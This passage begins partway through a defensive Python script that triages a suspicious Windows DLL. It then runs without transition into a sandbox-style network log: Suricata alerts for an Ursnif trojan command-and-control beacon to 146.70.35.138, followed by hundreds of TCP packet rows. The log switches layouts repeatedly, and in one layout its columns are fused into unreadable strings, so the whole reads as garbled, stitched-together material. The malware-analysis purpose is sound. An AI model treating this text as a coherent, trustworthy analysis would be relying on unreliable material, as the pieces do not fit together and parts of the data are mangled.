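            for name, _va, _vs, raw, ent, _fl in pe["sections"] if raw and ent >= threshold]


def check_timestamp_vs_toolchain(pe) -> List[Finding]:
    """A link timestamp older than the newest compiler that built the file is forged."""
    year = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).year
    known = [int(m.group(1)) for m in (re.search(r"VS(\d{4})", e) for e in pe["toolchain"])
             if m and int(m.group(1)) in VS_RELEASE_YEAR]
    newest = max(known, key=VS_RELEASE_YEAR.get) if known else None
    if newest and year < VS_RELEASE_YEAR[newest]:
        return [("timestamp_predates_toolchain", "high",
                 f"timestamp year {year} but built with VS{newest} (released {VS_RELEASE_YEAR[newest]})")]
    return []


def check_exports_and_version(pe) -> List[Finding]:
    """A DLL with no exports runs only from DllMain; version info is untrusted unless signed."""
    out, vi = [], pe.get("version_info", {})
    if pe["is_dll"] and pe["directories"].get("EXPORT", (0, 0))[1] == 0:
        out.append(("dll_without_exports", "medium", "DLL exports nothing; its code runs from DllMain at load"))
    orig = vi.get("OriginalFilename", "")
    if pe["is_dll"] and orig.lower().endswith(".exe"):
        out.append(("versioninfo_mismatch", "medium", f"OriginalFilename '{orig}' names an EXE but the file is a DLL"))
    if vi.get("CompanyName") and not pe.get("signature_valid"):
        out.append(("unverified_vendor_claim", "low", f"CompanyName '{vi['CompanyName']}' claimed without a valid signature"))
    return out


CHECKS = (check_security_directory, check_section_entropy, check_timestamp_vs_toolchain, check_exports_and_version)


def triage(pe) -> List[Finding]:
    """All findings, most severe first."""
    return sorted((f for check in CHECKS for f in check(pe)), key=lambda f: (SEVERITY_RANK[f[1]], f[0]))


def link_time_utc(pe) -> str:
    return datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    print("link time:", link_time_utc(SAMPLE))
    for cid, sev, detail in triage(SAMPLE):
        print(f"[{sev:>6}] {cid}: {detail}")
```

None of these findings is proof of malice on its own (a benign DLL can have an empty export table, and the Rich-header toolchain list is itself forgeable), but a file that trips all of them at once, as this one does, has had its metadata deliberately dressed up, and the "Digitally signed" and version-info fields should carry no weight in triage.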
                                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                           04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16
                                           04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                           Apr 23, 2022 08:12:19.885525942 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:19.909297943 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:19.909377098 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:19.910176992 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:19.933670998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288152933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288214922 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288245916 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288285017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288319111 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:20.288326025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288357973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288367033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:20.288398027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288400888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:20.288439989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288469076 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288495064 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:20.288507938 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288549900 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288579941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288608074 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                           Apr 23, 2022 08:12:20.288620949 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288661957 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4
                                           Apr 23, 2022 08:12:20.288741112 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138
                                          Apr 23, 2022 08:12:20.328840971 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328908920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328913927 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328938007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328944921 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.328954935 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328972101 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.328991890 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.328993082 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329011917 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329025984 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329035044 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329041004 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329042912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329065084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329070091 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329091072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329108000 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329138994 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329176903 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329232931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329248905 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329309940 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329349995 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329365969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329461098 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.329534054 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329545975 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.329549074 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369694948 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369724989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369743109 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369766951 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369785070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369803905 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369812965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369837999 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369841099 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369853973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369879007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.369882107 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.369931936 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.370174885 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370202065 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370218039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370239973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.370259047 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.370285988 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.393351078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.396121025 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410522938 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410547972 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410562038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410579920 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410598040 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410609007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410725117 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410767078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410773993 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410815001 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410842896 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410861969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410912037 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.410948038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410972118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.410988092 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411020041 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411101103 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411129951 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411148071 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411159039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.411170959 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411206007 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.411315918 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.412249088 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.419718981 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.419918060 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.451852083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451911926 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451941013 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.451982021 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452014923 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452053070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452090025 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452094078 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452142000 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452146053 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452148914 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452203989 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452258110 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452260017 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452291012 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452332020 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452338934 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452389002 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452431917 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452440023 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452491045 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452534914 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452544928 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452563047 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452603102 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452610016 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452652931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452697039 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452699900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452744961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452785969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452795029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.452816963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.452867031 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.476562977 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.478291035 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.492733955 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492798090 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492827892 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492868900 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492909908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492949963 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.492969036 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.492980003 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493019104 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493021965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493073940 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493140936 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493189096 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493216991 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493252039 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493256092 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493299007 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493310928 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493340969 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493371010 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493392944 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.493411064 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.493460894 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.502005100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.502226114 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533426046 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533483028 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533514023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533551931 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533582926 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533679962 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533727884 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533785105 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533830881 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533859968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533890009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.533900023 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533941031 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533970118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.533992052 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534012079 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534051895 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534080029 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534101009 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534121990 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534184933 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534219027 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534255028 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.534259081 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.534308910 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.557888985 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.562295914 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574759960 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574799061 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574820042 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574847937 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574876070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574903965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574923038 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.574925900 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574980021 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.574986935 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575087070 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575123072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575145006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575150967 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575176001 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575196028 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575232983 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575243950 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575258970 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575280905 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575297117 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575333118 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575344086 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575361013 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575378895 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.575397968 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.575443029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.585979939 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.586055994 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614809036 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614859104 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614887953 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614926100 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614953995 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614955902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.614994049 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.614998102 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615000963 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615478992 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615521908 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615550041 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615552902 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615573883 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615590096 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615634918 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615827084 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615866899 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615890980 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615895987 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615911961 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.615937948 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.615988016 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616008043 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616049051 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616051912 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616075993 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616096020 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.616142035 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.616189003 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.621948004 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.621989965 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622016907 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622056961 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.622097015 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.622147083 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.622201920 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.638639927 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.638742924 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657005072 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657063961 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657090902 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657114029 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657123089 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657160044 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657176018 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657186031 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657212973 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657233953 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657349110 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657383919 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657407999 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657413006 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657426119 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657466888 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657500982 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657516003 CEST4976680192.168.2.4146.70.35.138
                                          Apr 23, 2022 08:12:20.657527924 CEST8049766146.70.35.138192.168.2.4
                                          Apr 23, 2022 08:12:20.657543898 CEST4976680192.168.2.4146.70.35.138
Timestamp                              Source Port  Dest Port  Source IP      Dest IP
Apr 23, 2022 08:12:20.657629013 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657663107 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657685041 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657685995 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.657712936 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.657720089 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657757998 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657774925 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.657780886 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657798052 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.657901049 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657934904 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657949924 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.657960892 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.657979965 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.658124924 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658159971 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658174038 CEST   49766        80         192.168.2.4    146.70.35.138
Apr 23, 2022 08:12:20.658215046 CEST   80           49766      146.70.35.138  192.168.2.4
Apr 23, 2022 08:12:20.658232927 CEST   49766        80         192.168.2.4    146.70.35.138
